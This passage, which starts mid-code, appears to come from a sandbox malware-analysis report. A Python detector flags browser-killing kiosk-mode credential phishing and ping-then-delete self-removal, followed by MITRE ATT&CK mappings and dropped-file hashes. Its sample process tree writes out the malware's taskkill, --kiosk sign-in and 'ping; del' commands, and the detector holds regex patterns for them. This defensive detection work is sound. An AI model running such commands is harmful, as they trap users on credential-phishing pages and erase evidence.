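URL_RE = re.compile(r"""https?://[^\s&"']+""")
SIGNIN_RE = re.compile(r"(?i)signin|login|challenge/pwd|password")
# "ping <target>; del <file>" on one interpreter line: sleep, then self-delete
PING_DEL_RE = re.compile(r"(?i)\bping(?:\.exe)?\s+(\S+)\s*;\s*del\s+(\S+)")


def image_name(p: Proc) -> str:
    return p.image.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def killed_browsers(cmdline: str) -> set[str]:
    """Browser images named by /IM on a taskkill command line."""
    toks = cmdline.lower().split()
    named = {toks[i + 1] for i, t in enumerate(toks[:-1]) if t == "/im"}
    return named & BROWSERS


def find_kiosk_phish(procs):
    """A launcher that kills browsers, then opens one in --kiosk on a sign-in URL."""
    children = defaultdict(list)
    for p in procs:
        children[p.ppid].append(p)
    findings = []
    for ppid, kids in children.items():
        killed = set()
        for k in kids:
            if image_name(k) in TASKKILL:
                killed |= killed_browsers(k.cmdline)
        if not killed:
            continue   # a kiosk launch alone is not enough; the kill step is the tell
        for k in kids:
            m = KIOSK_RE.search(k.cmdline) if image_name(k) in BROWSERS else None
            if m and SIGNIN_RE.search(m.group(1)):
                url = m.group(1)
                findings.append({
                    "rule": "kiosk_phish",
                    "launcher_ppid": ppid,
                    "pid": k.pid,
                    "killed": sorted(killed),
                    "url": url,
                    # a second URL hidden in the query string is the real target
                    "embedded": URL_RE.findall(urlparse(url).query),
                })
    return findings


def find_ping_then_delete(procs):
    """Interpreter lines that ping, then delete a file (delay plus self-removal)."""
    findings = []
    for p in procs:
        m = PING_DEL_RE.search(p.cmdline)
        if not m:
            continue
        target, victim = m.group(1), m.group(2)
        try:
            loopback = ip_address(target).is_loopback
        except ValueError:
            loopback = False   # a hostname: the ping may be a real reachability test
        findings.append({"rule": "ping_then_delete", "pid": p.pid,
                         "target": target, "loopback": loopback, "deleted": victim})
    return findings


def analyze(procs):
    return find_kiosk_phish(procs) + find_ping_then_delete(procs)


FF = r"C:\Program Files\Mozilla Firefox\firefox.exe"
TK = r"C:\Windows\SysWOW64\taskkill.exe"
SIGNIN = "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd"
SAMPLE_TREE = [  # constructed from the report's process tree
    Proc(7128, 0, r"C:\Users\Admin\AppData\Local\Temp\1017997001\5fd6925fa4.exe",
         r'"C:\Users\Admin\AppData\Local\Temp\1017997001\5fd6925fa4.exe"'),
    Proc(2688, 7128, TK, "taskkill /F /IM firefox.exe /T"),
    Proc(1720, 7128, TK, "taskkill /F /IM chrome.exe /T"),
    Proc(3172, 7128, TK, "taskkill /F /IM msedge.exe /T"),
    Proc(4476, 7128, TK, "taskkill /F /IM opera.exe /T"),
    Proc(2440, 7128, TK, "taskkill /F /IM brave.exe /T"),
    Proc(4160, 7128, FF, f'"{FF}" --kiosk "{SIGNIN}" --no-default-browser-check --disable-popup-blocking'),
    Proc(2140, 4160, FF, f'"{FF}" --kiosk {SIGNIN} --no-default-browser-check --disable-popup-blocking'),
    Proc(10068, 8872, r"C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe",
         r"C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe"),
    Proc(5148, 10068, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
         "powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe"),
    Proc(5436, 5148, r"C:\Windows\system32\PING.EXE", r'"C:\Windows\system32\PING.EXE" 127.1.10.1'),
]

if __name__ == "__main__":
    for finding in analyze(SAMPLE_TREE):
        print(finding)
```

The kiosk rule deliberately requires both halves, the taskkill siblings and the --kiosk launch, because kiosk mode on its own is legitimate on signage and point-of-sale hosts; the Firefox child at PID 2140 also runs with --kiosk but has no taskkill siblings and produces no finding. The ping rule reports whether the target is a loopback address so an analyst can tell a sleep from a genuine connectivity probe.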
Network
MITRE ATT&CK Enterprise v15
Execution
- Command and Scripting Interpreter (1)
  - PowerShell (1)
- Scheduled Task/Job (1)
  - Scheduled Task (1)
Persistence
- Boot or Logon Autostart Execution (3)
  - Authentication Package (1)
  - Registry Run Keys / Startup Folder (2)
- Create or Modify System Process (1)
  - Windows Service (1)
- Event Triggered Execution (1)
  - Component Object Model Hijacking (1)
- Scheduled Task/Job (1)
  - Scheduled Task (1)
Privilege Escalation
- Boot or Logon Autostart Execution (3)
  - Authentication Package (1)
  - Registry Run Keys / Startup Folder (2)
- Create or Modify System Process (1)
  - Windows Service (1)
- Event Triggered Execution (1)
  - Component Object Model Hijacking (1)
- Scheduled Task/Job (1)
  - Scheduled Task (1)
Defense Evasion
- Hide Artifacts (1)
  - Hidden Files and Directories (1)
- Impair Defenses (2)
  - Disable or Modify Tools (2)
- Modify Registry (5)
- Subvert Trust Controls (1)
  - Install Root Certificate (1)
- Virtualization/Sandbox Evasion (3)
Discovery
- Peripheral Device Discovery (1)
- Query Registry (9)
- Remote System Discovery (1)
- System Information Discovery (5)
- System Location Discovery (1)
  - System Language Discovery (1)
- System Network Configuration Discovery (1)
  - Internet Connection Discovery (1)
- Virtualization/Sandbox Evasion (3)
Downloads
- Filesize: 213KB
  MD5: eb35d4006f504b5296ef49d5340c523a
  SHA1: 0ac7af26025b1a0dde6848bcae544b4d90d64e11
  SHA256: 18b09f35d48ed94bd212df8fb0e69ba996cb2839ffdf11ee185e991f6b27b6d7
  SHA512: 4b9366a110e4b3ff80e77b6281d0fbb41f25c7e148c605e91ca1e57e0d9c8f0bf2fc084dabb15843bec0410d0b7103dfc1906b13c5e44bd5f20606497f5c0f8e
- Filesize: 48KB
  MD5: d524e8e6fd04b097f0401b2b668db303
  SHA1: 9486f89ce4968e03f6dcd082aa2e4c05aef46fcc
  SHA256: 07d04e6d5376ffc8d81afe8132e0aa6529cccc5ee789bea53d56c1a2da062be4
  SHA512: e5bc6b876affeb252b198feb8d213359ed3247e32c1f4bfc2c5419085cf74fe7571a51cad4eaaab8a44f1421f7ca87af97c9b054bdb83f5a28fa9a880d4efde5
- Filesize: 66KB
  MD5: 5db908c12d6e768081bced0e165e36f8
  SHA1: f2d3160f15cfd0989091249a61132a369e44dea4
  SHA256: fd5818dcdf5fc76316b8f7f96630ec66bb1cb5b5a8127cf300e5842f2c74ffca
  SHA512: 8400486cadb7c07c08338d8876bc14083b6f7de8a8237f4fe866f4659139acc0b587eb89289d281106e5baf70187b3b5e86502a2e340113258f03994d959328d
- Filesize: 93KB
  MD5: 75b21d04c69128a7230a0998086b61aa
  SHA1: 244bd68a722cfe41d1f515f5e40c3742be2b3d1d
  SHA256: f1b5c000794f046259121c63ed37f9eff0cfe1258588eca6fd85e16d3922767e
  SHA512: 8d51b2cd5f21c211eb8fea4b69dc9f91dffa7bb004d9780c701de35eac616e02ca30ef3882d73412f7eab1211c5aa908338f3fa10fdf05b110f62b8ecd9d24c2
- C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\ScreenConnect.WindowsAuthenticationPackage.dll
  Filesize: 254KB
  MD5: 5adcb5ae1a1690be69fd22bdf3c2db60
  SHA1: 09a802b06a4387b0f13bf2cda84f53ca5bdc3785
  SHA256: a5b8f0070201e4f26260af6a25941ea38bd7042aefd48cd68b9acf951fa99ee5
  SHA512: 812be742f26d0c42fdde20ab4a02f1b47389f8d1acaa6a5bb3409ba27c64be444ac06d4129981b48fa02d4c06b526cb5006219541b0786f8f37cf2a183a18a73
- C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\ScreenConnect.WindowsCredentialProvider.dll
  Filesize: 822KB
  MD5: be74ab7a848a2450a06de33d3026f59e
  SHA1: 21568dcb44df019f9faf049d6676a829323c601e
  SHA256: 7a80e8f654b9ddb15dda59ac404d83dbaf4f6eafafa7ecbefc55506279de553d
  SHA512: 2643d649a642220ceee121038fe24ea0b86305ed8232a7e5440dffc78270e2bda578a619a76c5bb5a5a6fe3d9093e29817c5df6c5dd7a8fbc2832f87aa21f0cc
- Filesize: 3KB
  MD5: 9322751577f16a9db8c25f7d7edd7d9f
  SHA1: dc74ad5a42634655bcba909db1e2765f7cddfb3d
  SHA256: f1a3457e307d721ef5b63fdb0d5e13790968276862ef043fb62cce43204606df
  SHA512: bb0c662285d7b95b7faa05e9cc8675b81b33e6f77b0c50f97c9bc69d30fb71e72a7eaf0afc71af0c646e35b9eadd1e504a35d5d25847a29fd6d557f7abd903ab
- Filesize: 931B
  MD5: e190ad2c95cef560dd7fba3e0399346d
  SHA1: 71cbbcf0f57780b863694f6e2ebbfeeac95aa526
  SHA256: b1cdb6fee5e2c07ec8ecd53a1b5a771ad6cce96a0fc9b02182800ec1c2fd3022
  SHA512: a524972df1a2b825d8c9cda34c85fb7fa0e34fa51c3d8f0bf8e82d601dd7cb4c9c5b2efa1e77370aea93a28c87c3bd2df135261947ce3248d0e878f6fcf5174b
- C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\1009pdhg.default-release\activity-stream.discovery_stream.json.tmp
  Filesize: 23KB
  MD5: 2a88f1b8848f4c6a905e224eeccfe51d
  SHA1: 1e171e1ae1cd3b4641ca26d0881ab562e93c53a4
  SHA256: 480b33896c31efcc0962522c32a78330bde886b826299b89996c68a34d40769f
  SHA512: 8864a3d180c8fae9fc659885a8b64f26162a4f98e430ac549fadb698e7ef5f9c8c233924f7540822da3846a8479669afa6812f5c9abfdd735559877d8042d3a5
- C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\1009pdhg.default-release\settings\main\ms-language-packs\browser\newtab\asrouter.ftl
  Filesize: 15KB
  MD5: 96c542dec016d9ec1ecc4dddfcbaac66
  SHA1: 6199f7648bb744efa58acf7b96fee85d938389e4
  SHA256: 7f32769d6bb4e875f58ceb9e2fbfdc9bd6b82397eca7a4c5230b0786e68f1798
  SHA512: cda2f159c3565bc636e0523c893b293109de2717142871b1ec78f335c12bad96fc3f62bcf56a1a88abdeed2ac3f3e5e9a008b45e24d713e13c23103acc15e658
- Filesize: 21KB
  MD5: 04f57c6fb2b2cd8dcc4b38e4a93d4366
  SHA1: 61770495aa18d480f70b654d1f57998e5bd8c885
  SHA256: 51e4d0cbc184b8abfa6d84e219317cf81bd542286a7cc602c87eb703a39627c2
  SHA512: 53f95e98a5eca472ed6b1dfd6fecd1e28ea66967a1b3aa109fe911dbb935f1abf327438d4b2fe72cf7a0201281e9f56f4548f965b96e3916b9142257627e6ccd
- Filesize: 5.4MB
  MD5: c9ec8ea582e787e6b9356b51811a1ca7
  SHA1: 5d2ead22db1088ece84a45ab28d52515837df63b
  SHA256: fb7dde7e6af9b75d598ae55c557a21f983f4b375e1c717a9d8e04b9de1c12899
  SHA512: 8cd232049adc316b1ba502786ac471f3c7e06da6feb30d8293ba77673794c2585ef44ef4934ff539a45ea5b171ce70d5409fdcd7b0f0a84aecd2138706b03fc4
- Filesize: 1.3MB
  MD5: 669ed3665495a4a52029ff680ec8eba9
  SHA1: 7785e285365a141e307931ca4c4ef00b7ecc8986
  SHA256: 2d2d405409b128eea72a496ccff0ed56f9ed87ee2564ae4815b4b116d4fb74d6
  SHA512: bedc8f7c1894fc64cdd00ebc58b434b7d931e52c198a0fa55f16f4e3d44a7dc4643eaa78ec55a43cc360571345cd71d91a64037a135663e72eed334fe77a21e6
- Filesize: 791KB
  MD5: e8af4d0d0b47ac68d762b7f288ae8e6e
  SHA1: 1d65f31526cc20ab41d6b1625d6674d7f13e326c
  SHA256: b83449768e7af68867c8bc42b19ff012722d88ea66aef69df48661e63e0eb15e
  SHA512: 80fad90314ff639f538a72c5e4ca2bf9ae52b9309caa7cd6f87d61791505bb3612b7f3190ab9b67348c5d71f4d29bb9d101e3f66d525eb9b5e2060a10b2d187a
- Filesize: 935KB
  MD5: 5b99682cb740202d783dde58ca97f045
  SHA1: cecae054552ce295feaa0717d2a33e870addcadd
  SHA256: 724e283e1bb29a150c9bebc21bdf0e250e2d87257bf86c889bbe7544329c6882
  SHA512: c37a2cb06407729344adb85d814223a24ec4fa65f711c7f02c0e77395ec969b7e1bd64a6f5806d4e2d88c8461587d68b6aae3378d2cf5c92f1ade2aacc13f2b2
- Filesize: 1.8MB
  MD5: 25fb9c54265bbacc7a055174479f0b70
  SHA1: 4af069a2ec874703a7e29023d23a1ada491b584e
  SHA256: 552f8be2c6b2208a89c728f68488930c661b3a06c35a20d133ef7d3c63a86b9c
  SHA512: 7dfd9e0f3fa2d68a6ce8c952e3b755559db73bb7a06c95ad6ed8ac16dedb49be8b8337afc07c9c682f0c4be9db291a551286353e2e2b624223487dc1c8b54668
- Filesize: 1.1MB
  MD5: ef08a45833a7d881c90ded1952f96cb4
  SHA1: f04aeeb63a1409bd916558d2c40fab8a5ed8168b
  SHA256: 33c236dc81af2a47d595731d6fa47269b2874b281152530fdffdda9cbeb3b501
  SHA512: 74e84f710c90121527f06d453e9286910f2e8b6ac09d2aeb4ab1f0ead23ea9b410c5d1074d8bc759bc3e766b5bc77d156756c7df093ba94093107393290ced97
- Filesize: 1.8MB
  MD5: ff279f4e5b1c6fbda804d2437c2dbdc8
  SHA1: 2feb3762c877a5ae3ca60eeebc37003ad0844245
  SHA256: e115298ab160da9c7a998e4ae0b72333f64b207da165134ca45eb997a000d378
  SHA512: c7a8bbcb122b2c7b57c8b678c5eed075ee5e7c355afbf86238282d2d3458019da1a8523520e1a1c631cd01b555f7df340545fd1e44ad678dc97c40b23428f967
- Filesize: 1.9MB
  MD5: 2da5c2bbe3a73ecea269706891e912fa
  SHA1: ceee3af9dc0a4903b2a2c708e3b33a70a417215b
  SHA256: fa2a0aa5f11e6c367d0ea66117dcf31086630222d1c2af5b46a92b7bfe1089f7
  SHA512: ae52660beca7e8a5926c690ed19142e90e688d0db871c1362d9e72fa40613e786340afedbecff2c5ea4bb68967e5917bc2c4d57dcadf44c69ce98f38102bef19
- Filesize: 21KB
  MD5: 14becdf1e2402e9aa6c2be0e6167041e
  SHA1: 72cbbae6878f5e06060a0038b25ede93b445f0df
  SHA256: 7a769963165063758f15f6e0cece25c9d13072f67fa0d3c25a03a5104fe0783a
  SHA512: 16b837615505f352e134afd9d8655c9cabfa5bfcfbee2c0c34f2d7d9588aa71f875e4e5feb8cdf0f7bacc00f7c1ca8dabd3b3d92afc99abf705c05c78e298b4a
- Filesize: 4.2MB
  MD5: 3a425626cbd40345f5b8dddd6b2b9efa
  SHA1: 7b50e108e293e54c15dce816552356f424eea97a
  SHA256: ba9212d2d5cd6df5eb7933fb37c1b72a648974c1730bf5c32439987558f8e8b1
  SHA512: a7538c6b7e17c35f053721308b8d6dc53a90e79930ff4ed5cffecaa97f4d0fbc5f9e8b59f1383d8f0699c8d4f1331f226af71d40325022d10b885606a72fe668
- Filesize: 4.2MB
  MD5: 8664a5a6e958f985735b8a17171550bc
  SHA1: 3deb8bfcdc32ddf9a678f44c59aa70e3a7f5bb5f
  SHA256: ffcc7288342a28c0580bea142951bf4ac33a3f391d8f9323f9e74293d2817e82
  SHA512: adc1c9bc3af3a39b066a9231ef6bd9119d48dff41a4e5bfac695c40a5d2b9e5e9f4eb6e4779408cd7f22fe0e7e5697d7fa314778864fd13bb321db3f8d0514b0
- Filesize: 3.1MB
  MD5: c00a67d527ef38dc6f49d0ad7f13b393
  SHA1: 7b8f2de130ab5e4e59c3c2f4a071bda831ac219d
  SHA256: 12226ccae8c807641241ba5178d853aad38984eefb0c0c4d65abc4da3f9787c3
  SHA512: 9286d267b167cba01e55e68c8c5582f903bed0dd8bc4135eb528ef6814e60e7d4dda2b3611e13efb56aa993635fbab218b0885daf5daea6043061d8384af40ca
- Filesize: 4.3MB
  MD5: a662856df913178c0e54b194afe4dd2b
  SHA1: 5cc4318e946e1a6f9625019d9e5150e480aeb2bf
  SHA256: f7b0783fdb5c0e335976b3f4baa43d8e76925ae478f341200c9474f1126ed7cb
  SHA512: 0e87b88f79b1f2b68ea907e9975979f587ec5c0451001b5404e4cc44ebc2e1072ae2f9b297e2a44a51d458622f076a2512265c8f48fe9bcd05626d17b2abc9de
- Filesize: 1.7MB
  MD5: 3647af905f92b479113300608444f101
  SHA1: 84e4d4c7beda95176ad3ddfcf10169f7da8e2bea
  SHA256: 6eb4d74f0c7cf5780099f4da5ea6f57c0648ad552888f7accf0c5251ae27bcac
  SHA512: 4cdedde69ec6d8ec92ffaf2ce4e5cc6ed39a954672d88f548ed8f7ad80f44bf875725ebf8593e1440cc939860e0e3f09e4e13092fb59f4a5a8600b8ce5167bb7
- Filesize: 2.8MB
  MD5: 2854309dfd78a64e325e67004b94addf
  SHA1: 78cf19390d1511e03139893c33d11bd2b7be5d99
  SHA256: ca61e922a2e723631b64b8d73b4af5bc968c5bb29ec1073c2060c11b79f7fa8d
  SHA512: fde2202160b9cfe3eb595d6b6a481b2a8122da0ef9b7208de741d2449a20b4e0bbe11f9cdb247a95c567cc40426ffff0741557f636159a468e9167308efb0ddf
- Filesize: 947KB
  MD5: 134e8ed7546996583f248f49c87d99a2
  SHA1: 7998f64c61662137e5ed3f0dbbe88dac493ad95c
  SHA256: 99ead08700a6db4f3d6fbc4dd6e9435a32e4d0bf168e241c46e34cef8620cecd
  SHA512: cc08efc2721fd49e971af55f3ed05114b9d9fe3ee51ecc7ef7ed2f9299a8a46e7fbfeb9cbaf6388079f00098c8b101d73b760fe843a70a8f0a63910df75e4d0a
- Filesize: 2.7MB
  MD5: 27d1c23073bbf3be2092a18ab4cf9818
  SHA1: cc101a86e9519506179c51b3fe675a52a701c6be
  SHA256: fbe50f1ee3463f3b76126739b438af49edd32fce2b636f57a9741b1689160c8b
  SHA512: ae692d5679119ea1e07832a2abc2acc3b58e76bf6baa1cd43cb0af30ea0aac684db9c53b0ce8afccaec5fdffcbed0254fd4f8d7c20b32c00eb3f53c839fbed5a
- Filesize: 70KB
  MD5: 49aebf8cbd62d92ac215b2923fb1b9f5
  SHA1: 1723be06719828dda65ad804298d0431f6aff976
  SHA256: b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
  SHA512: bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b
- Filesize: 1.0MB
  MD5: 8a8767f589ea2f2c7496b63d8ccc2552
  SHA1: cc5de8dd18e7117d8f2520a51edb1d165cae64b0
  SHA256: 0918d8ab2237368a5cec8ce99261fb07a1a1beeda20464c0f91af0fe3349636b
  SHA512: 518231213ca955acdf37b4501fde9c5b15806d4fc166950eb8706e8d3943947cf85324faee806d7df828485597eceffcfa05ca1a5d8ab1bd51ed12df963a1fe4
- C:\Users\Admin\AppData\Local\Temp\ScreenConnect\24.3.7.9067\98a59bd0eed9222b\ScreenConnect.ClientSetup.msi
  Filesize: 12.8MB
  MD5: 24579e5a1a15783455016d11335a9ab2
  SHA1: fde36a6fbde895ba1bb27b0784900fb17d65fbbd
  SHA256: 9e8537945eae78cfa227cc117e5d33ea7854e042ec942d9523b5a08c45068dc1
  SHA512: 1b54f5d169b1d4b91643633cef2af6eca945c2517ba69b820751f1bb32c33e6e0390afa7ddf20097472ce9c4716f85138c335652aa061491398e0c1136b60709
- Filesize: 181KB
  MD5: 4ea6026cf93ec6338144661bf1202cd1
  SHA1: a1dec9044f750ad887935a01430bf49322fbdcb7
  SHA256: 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
  SHA512: 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b
- Filesize: 2.9MB (the submitted sample, file.exe)
  MD5: 8c724813b4468960543fcbcb4635f74f
  SHA1: 23693d84c1441a3edc77686c5a613f747ccff8a6
  SHA256: 4cc2d946c5c43426f509193cb5bee665f59f46c795c4da045d3b5940d660e6d4
  SHA512: c10f32547cd5a5921fa826eb11d437887b13b75ecd6d4a284288e12498e9d5406a779fb2fa2632d38412b6310dc53fca530e59dc3b80db76165431b2cf405cfa
- Filesize: 458KB
  MD5: 619f7135621b50fd1900ff24aade1524
  SHA1: 6c7ea8bbd435163ae3945cbef30ef6b9872a4591
  SHA256: 344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2
  SHA512: 2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628
- Filesize: 440B
  MD5: 3626532127e3066df98e34c3d56a1869
  SHA1: 5fa7102f02615afde4efd4ed091744e842c63f78
  SHA256: 2a0e18ef585db0802269b8c1ddccb95ce4c0bac747e207ee6131dee989788bca
  SHA512: dcce66d6e24d5a4a352874144871cd73c327e04c1b50764399457d8d70a9515f5bc0a650232763bf34d4830bab70ee4539646e7625cfe5336a870e311043b2bd
- Filesize: 442KB
  MD5: 85430baed3398695717b0263807cf97c
  SHA1: fffbee923cea216f50fce5d54219a188a5100f41
  SHA256: a9f4281f82b3579581c389e8583dc9f477c7fd0e20c9dfc91a2e611e21e3407e
  SHA512: 06511f1f6c6d44d076b3c593528c26a602348d9c41689dbf5ff716b671c3ca5756b12cb2e5869f836dedce27b1a5cfe79b93c707fd01f8e84b620923bb61b5f1
- Filesize: 8.0MB
  MD5: a01c5ecd6108350ae23d2cddf0e77c17
  SHA1: c6ac28a2cd979f1f9a75d56271821d5ff665e2b6
  SHA256: 345d44e3aa3e1967d186a43d732c8051235c43458169a5d7d371780a6475ee42
  SHA512: b046dd1b26ec0b810ee441b7ad4dc135e3f1521a817b9f3db60a32976352e8f7e53920e1a77fc5b4130aac260d79deef7e823267b4414e9cc774d8bffca56a72
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
  Filesize: 7KB
  MD5: d0ca4e9b7a24cc2cc6cd4a39e142e3ac
  SHA1: aca3302b089b3302215f85fda99d3474d9116a75
  SHA256: 115f7d9167db4ab8f67ee9d4a80ce1ce25c2b2e7403e2a0c0cfc057446d5d688
  SHA512: 23f9cd4c7c14a4624da2caeb24509c8c7d8a6228bb19cef9954a7b78c99baee77706482a97f0df7c87bd2a1548053fb9800a911bf222c32c685ae071ad2ad08f
- C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1009pdhg.default-release\datareporting\glean\db\data.safe.bin
  Filesize: 2KB
  MD5: 071655346826d8539807545ef8b92403
  SHA1: 1a9415e589ea921b17ab2ee0603e4a84854cd1f3
  SHA256: f956bc540dd172c741dfc4f7c97c61af36ff362fc7d26e3af80dd9caf5bc6aa3
  SHA512: f6b0f29abdeb38b16b8ddf7cf78218a8099580d4bdd5ed539d9be4b5aca68f8b399d2ee55000ff82774fd67a13c90be2c6fd23ac6f50413789dc697270ce28bb
- C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1009pdhg.default-release\datareporting\glean\pending_pings\28747f81-9e96-41b0-b509-950c5300699f
  Filesize: 10KB
  MD5: 808f612d012338cad10e992412886a5d
  SHA1: 1c29b8c035173bbf70004a0537c57cf2b1053e95
  SHA256: 28a1cc467dbe9c2debd14cdbe825f62e97cc6cb93730744f03e13e14d0c4f5f3
  SHA512: a7e76b94452926d467b5c9d82437522daceda474b7dfdaf0d7b03bd43959516754a517b905ed46d6bdca6541d8feb80b6f27b3ecb8b28f36b957c019cad98f21
- C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1009pdhg.default-release\datareporting\glean\pending_pings\a562cdbe-4a66-4d26-b80f-4a7d158cedcc
  Filesize: 745B
  MD5: 8348051ad40be163980880e3cd758a36
  SHA1: aa7963722f1abd4b6b4fbd36c9fa457cb4c39782
  SHA256: 8a69dc3ea763925f035c597e298ab745766b86eb78c88958c6662fa4144c182c
  SHA512: 464ef342c2b67c45aed0a05160aac094760ae3280761cd23712e3f381616b33f1f74b7affdf68e4fce7920e395bf2ad94556d6cd648bf865849ea922052694fb
- C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1009pdhg.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.dll
  Filesize: 997KB
  MD5: fe3355639648c417e8307c6d051e3e37
  SHA1: f54602d4b4778da21bc97c7238fc66aa68c8ee34
  SHA256: 1ed7877024be63a049da98733fd282c16bd620530a4fb580dacec3a78ace914e
  SHA512: 8f4030bb2464b98eccbea6f06eb186d7216932702d94f6b84c56419e9cf65a18309711ab342d1513bf85aed402bc3535a70db4395874828f0d35c278dd2eac9c
- C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1009pdhg.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.info
  Filesize: 116B
  MD5: 3d33cdc0b3d281e67dd52e14435dd04f
  SHA1: 4db88689282fd4f9e9e6ab95fcbb23df6e6485db
  SHA256: f526e9f98841d987606efeaff7f3e017ba9fd516c4be83890c7f9a093ea4c47b
  SHA512: a4a96743332cc8ef0f86bc2e6122618bfc75ed46781dadbac9e580cd73df89e74738638a2cccb4caa4cbbf393d771d7f2c73f825737cdb247362450a0d4a4bc1
- C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1009pdhg.default-release\gmp-widevinecdm\4.10.2557.0\LICENSE.txt
  Filesize: 479B
  MD5: 49ddb419d96dceb9069018535fb2e2fc
  SHA1: 62aa6fea895a8b68d468a015f6e6ab400d7a7ca6
  SHA256: 2af127b4e00f7303de8271996c0c681063e4dc7abdc7b2a8c3fe5932b9352539
  SHA512: 48386217dabf7556e381ab3f5924b123a0a525969ff98f91efb03b65477c94e48a15d9abcec116b54616d36ad52b6f1d7b8b84c49c204e1b9b43f26f2af92da2
- C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1009pdhg.default-release\gmp-widevinecdm\4.10.2557.0\manifest.json
  Filesize: 372B
  MD5: 8be33af717bb1b67fbd61c3f4b807e9e
  SHA1: 7cf17656d174d951957ff36810e874a134dd49e0
  SHA256: e92d3394635edfb987a7528e0ccd24360e07a299078df2a6967ca3aae22fa2dd
  SHA512: 6125f60418e25fee896bf59f5672945cd8f36f03665c721837bb50adf5b4dfef2dddbfcfc817555027dcfa90e1ef2a1e80af1219e8063629ea70263d2fc936a7
- C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1009pdhg.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll
  Filesize: 11.8MB
  MD5: 33bf7b0439480effb9fb212efce87b13
  SHA1: cee50f2745edc6dc291887b6075ca64d716f495a
  SHA256: 8ee42d9258e20bbc5bfdfae61605429beb5421ffeaaa0d02b86d4978f4b4ac4e
  SHA512: d329a1a1d98e302142f2776de8cc2cd45a465d77cb21c461bdf5ee58c68073a715519f449cb673977288fe18401a0abcce636c85abaec61a4a7a08a16c924275
- C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1009pdhg.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll.lib
  Filesize: 1KB
  MD5: 688bed3676d2104e7f17ae1cd2c59404
  SHA1: 952b2cdf783ac72fcb98338723e9afd38d47ad8e
  SHA256: 33899a3ebc22cb8ed8de7bd48c1c29486c0279b06d7ef98241c92aef4e3b9237
  SHA512: 7a0e3791f75c229af79dd302f7d0594279f664886fea228cfe78e24ef185ae63aba809aa1036feb3130066deadc8e78909c277f0a7ed1e3485df3cf2cd329776
- C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1009pdhg.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll.sig
  Filesize: 1KB
  MD5: 937326fead5fd401f6cca9118bd9ade9
  SHA1: 4526a57d4ae14ed29b37632c72aef3c408189d91
  SHA256: 68a03f075db104f84afdd8fca45a7e4bff7b55dc1a2a24272b3abe16d8759c81
  SHA512: b232f6cf3f88adb346281167ac714c4c4c7aac15175087c336911946d12d63d3a3a458e06b298b41a7ec582ef09fe238da3a3166ff89c450117228f7485c22d2
- Filesize: 6KB
  MD5: e144da0fcc100861d71fb3cc9ca42f39
  SHA1: 2677570decd26c15bc58d907048a8f99fa2071a0
  SHA256: a6a658d51ac5d26ab3d155abe354a6a28514e47b66c3f3c6bae28ca89cb2da92
  SHA512: 4d89b73796b727c3ba618fe057ba23ef6dec83be2adbc3a8257c0342f5befde70235218988f29f771d44f8ad35eb641a42fff2fd3a8dbb0f2d6e65ed0aa9db86
- Filesize: 7KB
  MD5: 132bcb6d60fba86e12f4c9d38bc7aefd
  SHA1: 8698e81cb41d5717244f1933234fdd7e63209c7c
  SHA256: 5d7fcb989aec94e310c363cac477e45555672b4bb42f1d47e365e33d198ca10c
  SHA512: 3b5503658f852bfb298a6e31ae12e226ff3295ff22ee5a89282d3913a3b9647ea7c1582d45a2c24866c5649e9d7dba88629f02e3e8a4277ef15a1d340f7673d2
- Filesize: 7KB
  MD5: 670e0d524458ddb9e28b9b50074f16a9
  SHA1: 98bad4592313554e01d8440f31ad911035155cb4
  SHA256: 205357a06b94dcab5464c85754f7d44ef332bd8c1835be93ee2cd80871cf0595
  SHA512: 6af1826a026104f910b1f74f29b96dc13fb1e7aa1a1de5efe373b04e7bc2b66cf76b01b5162f7de6b90ccd4e0e32f4e3523715e7bb1cf45c350942f23f4aae32
- Filesize: 6KB
  MD5: 8cffa19e86631282a97fe6992b1b03c9
  SHA1: a40625fdd7ebff52e14c3f435f7f2c4dc842ec48
  SHA256: 642e42e69c46fac7645f23611198509cb00af680048fea511117423f69031eda
  SHA512: 9341d8cc60f9f9150444ce46925aee3c3ed0e4cdbf158312ebf5e0982a151c4451b1949a255496d3386f219f90576016af385edb75d297b5eb691bdce9814036
- C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1009pdhg.default-release\sessionstore-backups\recovery.jsonlz4
  Filesize: 4KB
